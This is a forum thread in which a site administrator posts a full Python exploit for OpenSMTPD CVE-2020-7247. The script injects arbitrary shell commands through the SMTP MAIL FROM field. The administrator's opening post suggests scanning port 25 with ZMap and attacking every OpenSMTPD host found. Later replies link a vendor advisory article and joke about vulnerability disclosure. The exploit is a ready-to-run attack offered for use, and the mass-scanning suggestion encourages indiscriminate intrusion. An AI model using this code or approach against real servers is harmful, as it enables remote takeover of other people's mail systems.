OpenSMTPD Exploit

Asphyxia

Asphyxia

Owner
Administrator
Joined
Apr 25, 2015
Messages
1,846
Solutions
2
Reaction score
2,201
Points
327
One could ZMap port 25, perhaps banner grab for OpenSMTPD, then smack all these.

Could be very dangerous, do not be stupid ;)

Code: 
# Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution
# Date: 2020-01-29
# Exploit Author: 1F98D
# Original Author: Qualys Security Advisory
# Vendor Homepage: https://www.opensmtpd.org/
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
# Version: OpenSMTPD < 6.6.2
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2020-7247
# References:
# https://www.openwall.com/lists/oss-security/2020/01/28/3
#
# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
# escape dangerous characters from user-controlled input. An attacker
# can exploit this to execute arbitrary shell commands on the target.
# 
#!/usr/local/bin/python3

from socket import *
import sys

if len(sys.argv) != 4:
    print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
    print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
    sys.exit(1)

ADDR = sys.argv[1]
PORT = int(sys.argv[2])
CMD = sys.argv[3]

s = socket(AF_INET, SOCK_STREAM)
s.connect((ADDR, PORT))

res = s.recv(1024)
if 'OpenSMTPD' not in str(res):
    print('[!] No OpenSMTPD detected')
    print('[!] Received {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] OpenSMTPD detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error connecting, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Connected, sending payload')
s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error sending payload, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Payload sent')
s.send(b'RCPT TO:<root>\r\n')
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')
 
Asphyxia

Asphyxia

Owner
Administrator
Joined
Apr 25, 2015
Messages
1,846
Solutions
2
Reaction score
2,201
Points
327
Also, another neat random fact:
1580840338296.png

China built a hospital in only 10 days, you have no excuses for putting anything off.. ;)
 
Cucumber

Cucumber

Member
Joined
May 19, 2016
Messages
7
Reaction score
2
Points
38
securityboulevard.com

OpenBSD OpenSMTPD Remote Code Execution Vulnerability (CVE-2020-7247)

Qualys Research Labs discovered a vulnerability in OpenBSD’s OpenSMTPD mail server that allows an attacker to execute arbitrary shell commands with elevated privileges. OpenBSD developers have confirmed the vulnerability and also quickly provided a patch. Proof-of-concept exploits are published...
securityboulevard.com securityboulevard.com

Maybe an interesting article to your Code.
Thanks for sharing - im not hosting my own MS - lucky me :p.
 
Asphyxia

Asphyxia

Owner
Administrator
Joined
Apr 25, 2015
Messages
1,846
Solutions
2
Reaction score
2,201
Points
327
Cucumber said:
Maybe an interesting article to your Code.
Click to expand...
Definitely is pretty damn cool, btw that code up there is not mine. I am subscribed to computer-related emergency notices and ironically they report on RCE (Remote Code Execution) rather quickly which in a way can tip attackers off to serious issues.

Such a push-pull game, security is eh.

Alert everyone of remote code execution, but shh don't tell the attackers ;) fun fun lol
 
You must log in or register to reply here.
Top